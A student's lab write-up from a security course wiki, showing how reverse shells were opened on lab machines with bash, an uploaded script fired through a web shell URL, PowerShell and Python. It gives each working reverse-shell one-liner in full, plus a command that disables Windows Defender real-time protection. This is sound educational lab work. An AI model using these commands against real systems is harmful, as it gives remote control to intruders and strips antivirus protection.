Lab 8.2 - Zacham17/my-tech-journal GitHub Wiki

Lab 8.2 : Reverse Shells

Bash Reverse Shell in Linux

  • I used the sec335-rocky host at a target for this part of the lab.
  • I SSH'd into sec335-rocky at 10.0.17.200
  • On my kali VM, is use the command nc -nlvp 4449 to listen for connections on port 4449.
  • In the ssh session on rocky, I used the command /bin/bash -i >& /dev/tcp/10.0.17.125/4449 0>&1
    • This command uses the eth0 ip from the KaliVM
  • Back on the kali VM, I now have shell access to sec335-rocky
  • I then started a wireshark capture with a filter for port 4449, and ran some commands from the reverse shell. I then followed the TCP stream and saw the commands I entered and their outputs.

Reverse Shell on Pippin

  • To get a reverse shell to pippin, I made a small shell script, called zmorprs.sh containing the command /bin/bash -i >& /dev/tcp/10.0.99.53/4449 0>&1
  • I then uploaded the file to the Pippin host via ftp.
  • On my kali VM, I then used the command nc -nlvp 4449 to listen for connections on port 4449.
  • From the browser, I executed the uploaded script using the URL http://10.0.5.25/upload/zmor.php?cmd=/bin/bash+zmorprs.sh
    • The zmor.php file is from Lab 7.1
  • This gave me access to the bash prompt on pippin from my kali VM. I was then able to execute commands

Reverse Shell Using Windows Powershell

  • On my Kali VM, I ran the command nc -nlvp 4449 to listen for connections on port 4449.
  • On my Windows VM, I ran the the following command from the terminal:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.125',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • This produced an error, as it was blocked by Windows Defender.
  • I disabled Windows Defender with the poweshell command Set-MpPreference -DisableRealtimeMonitoring $true
  • I then ran the powershell command again, and this time no errors were produced and I got shell access to my Windows VM from my Kali VM.

Reverse Shell Using Python

  • I found a python script online that I was able to use to get a reverse shell
    • I found the python script here
  • On my kali VM, is used the command nc -nlvp 4449 to listen for connections on port 4449.
  • On sec335-rocky, I typed the command python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.125",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
  • This gave me shell access to sec335-rocky from my Kali VM.

Reflection:

This lab taught me about various way of using reverse shells and the different vulnerabilities that systems may have. In this lab, I did struggle at first in getting a reverse shell on Pippin, but I later found out that I had the incorrect IP address in the zmorprs.sh file and I had the filetype as .php instead of .sh, but once I fixed the errors, I smoothly carried on throughout the lab.